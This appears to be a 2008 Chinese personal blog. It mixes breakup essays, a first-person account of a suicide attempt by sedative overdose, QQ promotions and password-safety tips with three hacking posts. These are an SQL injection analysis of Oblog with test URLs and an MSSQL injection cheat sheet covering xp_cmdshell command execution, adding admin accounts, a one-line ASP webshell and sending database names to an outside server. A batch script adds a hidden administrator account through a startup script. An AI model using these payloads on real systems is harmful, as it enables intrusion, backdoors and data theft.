Night's blog

感情的世界里没有谁对不起谁

2008-07-17T23:36:44+08:00

分手了就不要做朋友，最好不要再见面，没有什么人能忍受自己曾经的爱人现在在别人的怀抱里，还是忘记吧！

在感情的世界里没有谁对不起谁，只有谁不懂得珍惜谁。如果你是对的，那么放爱一条生路，如果你错了，那么就饶了自己。

爱情是两个人的游戏。一方一旦转身就不易被感动，即便你感动的了上苍也感动不了他，即便感动了他，在他转身的那一瞬你会突然发现你们的感情已经不是你当初想要的那段了。

忘了伤痛的回忆，你会发现原来天空也可以这样辽阔的，除他以外的快乐更值得珍惜。一个人的快乐，一个人的幸福，一个人的寂寞，不需要任何人的快乐与悲伤来衬托，自己就是自己的主题，可以很简单的生活。

珍惜现在的所有，不要轻易回头，趁我们还年轻尽量的享受青春的美好吧！放弃悲伤，让自己用微笑迎接所有的挑战!

这片曾经属于我们的天空

2008-07-14T15:34:22+08:00

老婆~

　　当你看到这封信的时候，偶已经彻彻底底的忘记了你！忘记了曾经发生的所有事情！偶乞求上帝掏空了偶的所有记忆，只单纯的还原了偶最初的样子……

　　上帝是有怜悯之心的，他虽然掏空了偶的记忆，但却把含有记忆的水晶送给了偶！他希望偶知道那里面发生的故事，希望偶只是当它是一个故事去看待！要偶知道，这条路从开始走便是痛苦的，要偶不要再一次犯错……

　　透过漂亮的水晶，偶看到好多漂亮的事物！西安火车站第一次的相遇；咱们在宝鸡的点点滴滴；为了点小事吵嘴；青成山外,风景脚下的宝鸡；风景区散落的999拼凑成的心型；一切水晶所显示的画面都让偶觉得美妙……直到现实的一切把你拉回去的那瞬间，一切都崩溃了！偶不知道说那些话的时候你们是什么表情，你说你要走了,虽然偶能接受你所给的理由，但是偶的心依然很痛！

　　看到了水晶发生的事情，偶的心猛然的刺痛！它是在警戒偶表再一次重蹈覆辙！偶很明白，很清楚！所以偶没有哭，偶在微笑！

　　然后偶告戒自己要认真的记住，当你离开偶！当偶的心真的在痛，眼泪快要流下来的时候，那就赶快抬头看看，这片曾经属于偶们的天空。当天依旧是那么的广阔，云依旧那么潇洒，那就不应该哭，因为你的离去，并没有带走偶的世界！

她走了，我想死，我想她。

2008-07-14T09:38:22+08:00

看到想自杀的人大家肯定说我很傻吧.....可是..我真的没活下去的信心了
事情从高1开始恶化.从小父母离异，却又争吵不断的家庭在我的成长里留下了阴影...高中后学习压力又很大（山东的教育很变态）开始焦虑.烦躁.逐渐和家庭对抗.与父亲大打出手.开始无心学习，堕落，变成个坏孩子.这样，我得了抑郁症..心理的不稳定不得不辍学..辍学期间，在网上碰到了她..她比我大两岁是大学生，整天陪我解闷，开导我，我有些失去理智烦躁的时候她也从不生气或者是害怕，总是对我说，如果我在你身边我就抱住你，那样你会好的....
没有用药物，没有什么心理医生，我心情好了起来，甚至有回学校的想法..她成了我认定这一生都会在一起的爱人，有她在，我愿意放弃一切，她成了我的全部。我经常去看她，她每次都高兴的甚至逃课陪我出来玩，每天我们就那样发着短信，我手机停机几天她都会跑来看我，那担心的眼神让我看了心里好暖。。好暖。。。
就这样...我们一直感觉自己是世界上最幸福的人....
后来..有一阵子她的短信少了，甚至几天都不回，我很担心，她却总说没事敷衍过去.....也不让我去看她了....就这样直到有一天，她“狠心”的对我说了分手....说我小....让我去找个更合适我的，从此手机停机，断了联系.....那天我心彻底碎了....我抱着我妈哭了一晚上.....木了整整两天..没吃饭，没喝水....每天晚上躲被窝里哭....直到眼泪都干了，哭不出来了...
我不甘心.....我不信她会那样，自己又跑去看她...这1去..却是永别....我去了她学校....腾腾告诉我...她早就不上了....我问去了哪，她说不知道...我厚着脸皮找到她家里...碰到她父亲..我问她去了哪...他说在医院.....
血癌晚期....她的父亲掉着泪给我说她的病情.....我木了....傻了...感觉无数把尖刀插入自己心脏。
我忍着泪，忍着那随时要爆发的感情.在病床旁边陪了她2个月..直到她笑着走了....我终于压抑不住了....嚎啕大哭...泪干了拿着脑袋撞墙..使劲撞...不知道痛....
我被母亲接回去后...服了安定想自杀...去找她..可是...被抢救了过来..我真的没有活下去的理由了..我想她，好想，好想.........

忘记昨天,明天的生活会更好!(踩空间的时候写的)

2008-07-09T06:21:28+08:00

忘记昨天，明天的生活会更美好.
咱俩真是同病相怜呐.
不过我现在已经好了。
忘记那些另你伤心的人。
本来我也不想说这么多的。
可是你的空间的歌曲
让我想起了很多很多。
整个人又沉浸到悲伤的世界中!
有一句话说的真好啊。
她走了，但同时把我的快乐也带走。
想想，当她或他，没进入到你生活中的时候。
是如此的单纯而快乐，玩玩游戏，踩踩空间。
和朋友闹闹小嘴，为了空间的几千条留言而繁忙一整夜。
那时候是多么的单纯，快乐。
好了，不发牢骚了，我建议你将空间的歌曲换成别的。
伤感的歌曲，只会让自己再沉浸到里面。
就说这么多了，远方的朋友会一直祝福你。
希望你幸福永远，真心祝福！！！

我们告别单纯

2008-07-09T06:15:51+08:00

你真的忘得了你初恋情人吗
假如，有一天，你遇到了跟她长的一模一样的人，她真的就是她吗
还有可能吗
这是命运的宽容，还是另一次不怀好意的玩笑
从开始到现在
没有过去
如果追忆，那现在也会变成过去
不是因为这个缘故我却难过的只想哭
一　手边的咖啡冷了，总有另一杯在炉上沸腾
掐指算来,距离我们分别,已经有半年了。半年来，我们彼此断绝联系。尽管，我们还在同样的城市穿梭，有时也许会在陌生的街角擦肩。我们仍然寂寞。但是，命运，却让我们从此陌路。
半年了，一百八十多天，很长。然而，和相识的两个月里的每一天比起来，又算得了什么？如果，生命可以重来，我一定还是要这样纠缠。还是愿意，让无数个一百八十多天来填满生命一段长长的空白。
二　感谢相遇，我们可以从此携手
白煦的路灯光下，我总错觉我们的第一次相见。他那样的微笑。披着一身的银色站在路灯下。纯净温柔。犹如台灯灯光静谧的质地。
我们默契的相视而笑。在那个拥挤喧哗的街头。夜色如水，荡漾在彼此的心间。他走过来，牵起我的手，带着我穿过车水马龙。
夜，在那一刻停住在时光的深处。凝固。所有的嘈杂，也幻化成林林碎碎的音乐背景。衬托在身后。成为生命中永远的声响。
我们一起在夜西湖的边缘，踯躅。像两个不着边际的游魂。漫无边际。天下起了毛毛细雨。星星点点打在裸露的皮肤上，痒痒的感觉。轻柔的灯光在夜色里无声的消融。人烟渐渐稀薄。我们找了张长木椅坐下来。很长时间沉默着。对岸的咖啡吧还没有打佯。灯光照射过来，在树阴深处。潮湿而绵缠。我伸出十指。俏皮的说，我的手指戴上了十个月光戒指。他转过头来，看着我。怔仲出神。脸上泻满了含糊不清的笑意。我感觉到他的臂膀环抱我的温度。在这个清冷的夜里，有一种叫做温暖的东西，在心头荡漾开来。弥漫在甜蜜的空气里。

三　如果生活是一场意外，那么爱情是意外里的意外
国庆长假的那几天，天气忽然的阴雨潮湿。阻挠了许多出行，滋长了懒散。他还要加班。我吃着他为我备下的零食，穿着他的衬衣在他的电脑上上网。隔几个小时，他会从公司打来电话。问问我在做什么。我说聊天呢。他就笑笑，说你打开视频吧，让我看看你的小脑袋。我乖巧的打开视频，却故意不让他看见我的脸。只是给他看键盘上不停跳跃的手指。中午的时候，他给我叫外卖。叮嘱我别忘了开门。我总是不挑剔吃的东西。有时是西红柿炒蛋，有时是醋溜土豆丝。我也觉得幸福。没有欲望。
我不记得这不是我的家。充满陌生的气味。有着冰凉的布置。
我上网听歌。光着脚跑去阳台，把墙角推积的所有脏鞋都搜罗出来，一一洗静，凉晒在窗沿上。又用洗衣粉浸泡掉他多件衣服。而后用湿漉漉的拖把一遍一遍擦地板。一切自然。
他下班了，会为我推掉一些应酬。我坐在他的臂弯里，一起上网。在聊天室里交换角色泡MM和GG。有时聊到开心处，就互相笑起来。为共同导演的一场恶作剧而乐不可支。
夜在深处浓烈的释放。他把我抱在怀里。我刚刚洗过的长发，肆无忌惮的缠绕在他的手臂上。湿漉漉的。在夜阑时刻，如玫瑰花静静绽放。

四　很多年以后，开始相信，所谓爱情，都是因为寂寞，在那个瞬间。
爱会让人绝望吗？从认识的第一天起，他就不避讳问我这个问题，一遍又一遍，不厌其烦。
现在想来，这是一种怎样隐晦而湿答答的心情。我一直在揣摩他问这个问题的初衷。如果曾经他为爱所伤，那我是否应该告诉他，爱到了残忍的极限，而你又无法挽留时，你会绝望到自杀。但如果他对爱还是一种朦胧而一知半解的程度，为了不打击他追求爱的能力，我又是否应该回答他爱会让人幸福？
他和我说起过他生命中的女孩。满脸的陶醉和伤感。如烟似雾地,顷刻间吞噬了他。我猫在他的怀里，安静的倾听。窗外，有雨丝敲在雨棚上反弹回去的声音。记忆在此豁开了一个缺口。温暖。厚重。潮湿。
至少，今夜不寂寞。他迷雾般的看着我，喃喃自语。
生活在城市的人们，总是有这样或那样的寂寞。可是，爱情不是寂寞的借口。我后来憎恨寂寞这两个字眼。恨它从他嘴里吐出来的轻描淡写。抹杀掉一切的罪责。使灵魂冰凉，隔绝温暖，冷却希望。
数天的阴雨，有一天放晴，谁都没有察觉。我们的脸上还残留着发霉的潮湿。阳光透过蓝白相间的窗帘，在房间投影下一大片支离破碎的班驳。像心的某个深处，不堪忍受。惶惶然，爆裂开来。
我把他床上一条条的棉被抱到太阳底下。晚上，他回来的越来越迟。有时，彻夜不归，也没有一个电话。而我傻傻的一个人守着电脑。上网。听歌。吃零食。床边的台灯始终没有熄灭。还记得他说过，因为家里有我，他归心似箭。
窗外，城市的夜空一篇迷蒙。在杭州三年，我一直抱怨这里的星空，浑浊不堪。鲜有月朗星稀的时候。而我就这样把青春挥霍了。留不住任何的人，任何的誓言。我一直在城市的喧嚣里苍老。无力自拔。
和他在一起的日子，很短暂，却又那样的琐碎，冗长。只因为是他给的。我心甘情愿背负我的沉重。
我们之间一直有一种叫做感情的东西需要生活来诠释。只是我们都是怠懒的人物。不习惯也不善于假借其他来搪塞。可是，还有其他选择吗？
在一起的时候，我们不会意识到别离。像一对倦鸟，相守。真正要别离，才知道，一切只是宿命。像一阵风，吹过，或许会有酸楚，但是已经无谓了。分手其实不过如此。
我在绝望，只是麻木到看不见。

五　爱永远在路上，无法停留
夜里，他送我回去。我们走了一段很长的路。那么漫长，仿佛走了一生。他一直不说话。我一声不吭走在前面。上车的时候，朝他挥手。他的脸在车窗外一闪而过。模糊的好象我从来都没有见过他。在那个阴雨的日子，我们只是擦肩而过的陌路人。因为末路，所以故事的开头就是一场梦。
我不记得，转过头的刹那，我是否就流泪了。可是我宁愿相信，在最后的一刻，他看到的仍然是我坚强的笑脸。
以前每次都是这样的送别，却没有一次是这样的沉重。我等着另一班公交时，他发消息来说，风就这样吹，吹过后才悔，你悔么。我的意志突然变的薄弱，眼角湿湿的跌出了几颗泪珠。可是，他再也看不见了。车窗外。隐隐约约溢进挂花的清香。让我想起那个小阳台。某个清晨，也是这样的清香缭绕。我们一起站在阳台一隅，张望。孩童的兴致。我的手指指向那丛金黄。嘴里絮絮叨叨，学校的外围，隔几米就有栽有这样的一棵金桂。

六　我们一直是陌生人的姿态
天气忽然就冷下来。毫无征兆。立冬后最冷的日子。走在街面上，啮骨的冰凉。天空中微微飘着雨点。我们一起去搭公交。他走在前面，撑着深兰色的伞。偶尔回头张望我。冰冷的目光在肃穆的表情后面一掠而过。
站在红绿灯下，身边是坚硬的车流。走到不远处候车。视线里还残留着远去车影的破碎。他转过头来朝我笑。含糊的表情。高架桥下上空星星点点的细雨飘下来。我们各自站定一角，凉意伴随着清冷的站牌一点一点蔓延开来。
许久，公交跌荡着带走冰凉里浸润的人们。我站在前门的位置，转回头，无法看见纵身钻进后门的他。窗外的雨一直下，在车流的噱隙里无声的落脚。染湿了大片的地面，也染湿了人的目光。
下车朝各自的方向走去。我独自穿过车流，走到对面。早晨的天空，还很暗淡。略微的惆怅和落寞。
走在校园的甬道里，风很大。很冷。我的手机拿起又放下。我想我真的不要求什么了，只想告诉他，明天有没有无所谓，只要走过这个冬天。而这个冬天却已经这么冷了。

七　我们一起醉，在这深夜
我一直想不起那是一种怎样的情绪。醉生梦死吗？
柔和的灯光下，他把掺了很多雪碧的红酒递给我。我接过，放在手里轻轻晃动。玻璃杯里的液体顺势起伏。流溢的光华。像血的红。
我喝了不知有多久。脸上渐渐泛起潮红。他夺下我的酒杯，下巴轻柔的磨蹭我的脸颊。傻瓜，小傻瓜！小声呼唤我，声音是如此温柔。
终于没有喝完那杯红酒。书架上，那半瓶红酒从此寂寞。
也许某一天，会有一个笑烟如花的女子轻启朱唇，一点一点泯下它。

八　时间让我们告别单纯
我们沉湎彼此的气味，柔软的身体。孤独，让我们彼此渴求。
我常笑说他迷茫的眼神里暗藏不可预测的皮肤饥渴症。
我想我们只是在不同的地域，和时间溺水。有挣扎的欲望。因而有所依恋。
这是一个巧合。
上帝很偶然的把两枚色泽音色相吻合的石子顺手扔在了一个花圃里。太阳出来的时候，我们一起唱歌，一起转身，然后发现彼此。轻轻互道一声：你也在这里吗？
仅此而已！

三个免费抢QQ神秘黑钻方法

2008-07-06T05:15:39+08:00

在搜搜中输入“地下城与勇士”，就会出现为大家准备的DNF搜搜直达区：http://www.soso.com/q?pid=zdq.bar.dnf&w=DNF

　　地下城与勇士搜搜直达区庆游戏公测，特推出“激情直达区　体验有大奖活动”。

6月20日-6月26日，点击直达区的“抢QQ黑钻”按钮，使用你的QQ号登陆，就有机会获得我们送出的体验黑钻(体验时间为7天，同一QQ号码活动期间只可体验DNF黑钻1次)。　　心动不如行动，只要轻轻一点，即刻拥有尊贵黑钻！

　　点这里快速抢QQ黑钻
http://i.soso.com/i.q?op=login&ref=http%3A%2F%2Fbao.soso.com%2Findex.php%3Fop%3Ddnf

同一QQ号码活动期间只可体验DNF黑钻1次，体验时限为7天，为抽奖，没中的话可以过5分钟以后再去。
二、旋窝联合DNF开启神秘黑钻之旅
1.活动时间2008年6月20日—6月30日。成功报名的用户，只需在活动期间进入旋窝，新增旋风50积分即有机会获得礼品。
　　 >>点击进入旋窝<<
http://x.soso.com/

　　2.活动期间共随机赠送DNF游戏道具200000件、黑钻10000个(7天体验资格）已获奖的用户请进行
　　>>兑换领取道具<<
http://dnf.qq.com/web200805/cdkey.htm?ADTAG=IED.InnerAD.QQcom.eddy23

　　3.非报名用户及旋窝新增积分未达到50分的用户不能获奖。

　　4.获奖通知将通过QQ邮箱通知，您也可以在获奖名单中 >>查看获奖信息<<
http://x.soso.com/res_manage/activity/dnf_review.html

　　小提示：

　　1.请您确保QQ邮箱处于开通状态，否则您将无法收到获奖邮件。
　　2.同一QQ号码活动期间只能报名一次，黑钻和游戏礼包不能在同一QQ号码获得。

　　三、积分体验DNF尊贵黑钻特权
活动规则

　　1、本次活动面向所有QQ积分用户，已经通过其它渠道领取过黑钻7天体验的用户不参加此次活动。QQ服务网
　　2、活动时间：即日起至2008年6月27日16:00，一个QQ号码仅有一次体验机会；
　　3、活动期间，每天限量供应3000个，先到先得；
　　4、用户兑换成功后，会得到一个激活码，凭该激活码到DNF官方网站进行激活，获取黑钻7天体验；
　　5、腾讯公司对本次活动规则有最终解释权。

　　兑换地址：http://jifen.qq.com/others/dnf/dnf_detail.shtml

　　以上活动体验黑钻只有7天时间，而且同一QQ号码活动期间只可体验黑钻1次。

2008QQ密码防盗大法

2008-07-06T05:14:29+08:00

第一招：复制粘贴防木马

　　每次登录QQ前，新建一个文本文件，并键入密码后复制，关闭文本文件后(不要保存)打开QQ，用“Ctrl+V”把密码粘贴到密码栏里，这样可以防范绝大部分的QQ木马。

    第二招：常换密码保安全

　　登录QQ时使用一个密码，使用完毕后在“新口令”栏中输入另一个密码，所以可以准备两个常用的密码，也可以防范大多数的QQ木马。

    第三招：移花巧接木

　　如果中了键盘记录机，那么你可以参考这种方法。假如你的QQ密码是“5009”，在输入时不要按顺序一次输入，这样键盘会被木马直接记录下来，你可以先输入“509”，然后把光标移到“5”后面再输入“0”，这样你输入的密码依然是“5009”，但在“木马”看来你输入的就是 “5090”，这样密码就被保护了。

    第四招：隐私保护显神通

    隐私保护设置

　　可以借助有隐私保护功能的杀毒软件，以KV2004为例。首先应当把“实时监控”中的“隐私保护监视”打上勾。然后点击“工具→选项→实时监控”，点开“隐私保护设置”，弹出“隐私信息设置”窗口，在“检测到秘密信息后处理方式”中选择，“禁止发送私密信息”。

　　在选择完处理方式后，就可以单击“增加”按钮选择要保护的信息类型，然后填入相关信息，按“确定”后，个人隐私内容即可得到很好的保护了。
这样也可以有效保护你的密码。

    第五招：暗战超级密文

　　用一个16进制的编辑器，譬如UltraEdit，新建一个10个字节的文件，输入“B92CB92CB92CB92C”，将其保存为 Test.txt。如果你用记事本打开这个Test.txt，你什么也看不到，因为这都是不可见的字符，但是可以使用快捷键“Ctrl+A”，将其全部选中，然后“Ctrl+C”复制。这时，剪贴板的内容就可以作为你的密码了，直接在密码栏按“Ctrl+V”，密码就输入进去了。

　　看到这里，也许你会问，这也没什么奇怪的地方啊？你再打开写字板，把剪贴板里的内容“Ctrl+V”一下。你看，不一样了吧？你会发现里面出现了4个“？”符号，奇怪吧，不仅在写字板里这样，在Word或WPS以及网页里，都会有同样的效果。明白了吧，如果有人知道了你的“密码找回”并试图使用的话，他会在返回的网页里看见几个“？”符号，错误的认为那就是密码，这样当然是进不去QQ的了。这里笔者只是做一个例子，实际上每一个B92C 的组合都会产生一个“？”(真正的“？”符号的ASCLL码是63)，而是要有一个组合就可以起到保密的作用，其余的字节你可以随意填写，这样就不怕你的密码被人偷盗了。

Oblog最新注入漏洞分析

2008-07-01T02:01:28+08:00

Date：2008-5-15
Author：Yamato[BCT]
Version：Oblog 4.5-4.6 sql

代码分析：

文件In/Class_UserCommand.asp :

strMonth=Request("month") //第63行

strDay=Request("day")

……

Case "month" //第84行

Dim LastDay

G_P_FileName = G_P_FileName & "month&month=" & strMonth

strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"

mYear=Left(strMonth,4)

mMonth=Right(strMonth,2)

If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then

LastDay = "31"……

Else //第109行

SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "

构造合适的变量strMonth进行注射

测试方法:

http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据，并判断strDay是否为日期数据。所以构造的注射语句为：

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.

常用的一些注入命令

2008-06-22T20:46:35+08:00

//看看是什么权限的
and 1=(Select IS_MEMBER(’db_owner’))
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(’master’))
And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’

搜索类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’

爆用户名
and user>0
’ and user>0 and ’’=’

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--

select * from openrowset(’sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)

//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1

然后利用jet.oledb执行系统命令
select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user admin admin1234 /add")’)

执行命令
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;--

EXEC [master].[dbo].[xp_cmdshell] ’cmd /c md c:\1111’

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’)

写注册表
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1

REG_SZ

读注册表
exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’

读取目录内容
exec master..xp_dirtree ’c:\winnt\system32\’,1,1

数据库备份
backup database pubs to disk = ’c:\123.bak’

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,’新密码’,’sa’

添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc ’xp_cmdshell’

添加扩展存储过过程
EXEC [master]..sp_addextendedproc ’xp_proxiedadata’, ’c:\winnt\system32\sqllog.dll’
GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol ’stop’,’schedule’
exec master..xp_servicecontrol ’start’,’schedule’

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails ’C:\Inetpub\wwwroot\SQLInject\login.asp’

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
’c:\test.cab’,’mszip’,1,
’C:\Inetpub\wwwroot\SQLInject\login.asp’,
’C:\Inetpub\wwwroot\SQLInject\securelogin.asp’

xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab ’c:\test.cab’,’c:\temp’,1

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource(’sqloledb’,’server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123’;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20’’<%25execute(request("a"))%25>’’%20’;--

//更新表内容
Update films SET kind = ’Dramatic’ Where id = 123

//删除内容
delete from table_name where Stockid = 3

利用BAT脚本自动创建帐户密码

2008-06-22T20:43:58+08:00

@echo off
net user lanye lanye /add
net user localgroup administrators lanye /add

其实很简单吧！
这里的@echo off可以写也可以不写．作用是提示的．
把上面的代码保存为．ＢＡＴ文件之后那放在C:\windows\system32\GroupPolicy\Machine\Scripts\Startup这个目录里就可以了．然后那在写一个开机脚本就好了．文件名随便．

[Startup]
0CmdLine=a.bat（这个Ａ．ＢＡＴ文件是上面代码保存的文件名．随便起名字．在这里也可以写上路径的．就是这么简单．）
0Parameters=

这个把他保存为scripts.ini文件名字不可以改．然后那放在C:\winnt\system32\GroupPolicy\Machine\Scripts这个目录里就可以了．然后那就重新启动计算机．然后那可以看见你的帐户了．